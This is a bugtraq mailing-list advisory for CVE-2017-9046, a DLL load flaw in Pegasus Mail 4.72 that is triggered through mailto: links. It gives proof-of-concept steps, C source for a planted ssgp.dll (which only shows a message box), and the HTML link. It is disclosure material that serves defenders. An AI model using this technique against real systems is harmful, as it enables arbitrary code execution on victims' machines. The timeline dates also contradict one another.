[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution
From: apparitionsec () gmail ! com (hyp3rlinx)
Date: 2017-05-22 2:30:27
Message-ID: 201705220230.v4M2URm5000948 () sf01web3 ! securityfocus ! com
[Download RAW message or body]
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC
Vendor:
=============
www.pmail.com
Product:
===========================
Pegasus "winpm-32.exe"
v4.72 build 572
Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable \
for use by single or multiple users on single computers or on local area networks. A \
proven product, it has served millions of users since it was released in 1990.
Vulnerability Type:
======================
Remote Code Execution
CVE Reference:
==============
CVE-2017-9046
Security Issue:
================
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an \
HTML "mailto:" link if a DLL named "ssgp.dll" exists on the victims Desktop. Tested \
successfully using Internet Explorer Web Browser.
e.g.
<a href="mailto:name@victim.com">Link text</a>
Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click \
the mailto: link arbitrary code executed and Pegasus (pmail) is then launched.
User needs to have setup PMAIL with "mailto:" link option on install.
Exploit:
========
1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with \
"mailto:" link option on install.
2) Compile "ssgp.dll" as DLL using below 'C' code.
#include<windows.h>
//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
break;
}
return 0;
}
3) Place "ssgp.dll" on Desktop
4) Create an HTML file with following in the web server root directory.
<a href="mailto:name@victim.com">Pegasus Exploit POC</a>
5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link.
Our code gets executed...
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=====================================
Vendor Notification: October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties \
or guarantees of fitness of use or otherwise. Permission is hereby granted for the \
redistribution of this advisory, provided that it is not altered except by \
reformatting it, and that due credit is given. Permission is explicitly given for \
insertion in vulnerability databases and similar, provided that due credit is given \
to the author. The author is not responsible for any misuse of the information \
contained herein and accepts no responsibility for any damage caused by the use or \
misuse of this information. The author prohibits any malicious use of security \
related information or exploits by the author or elsewhere. All content (c).
hyp3rlinx
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic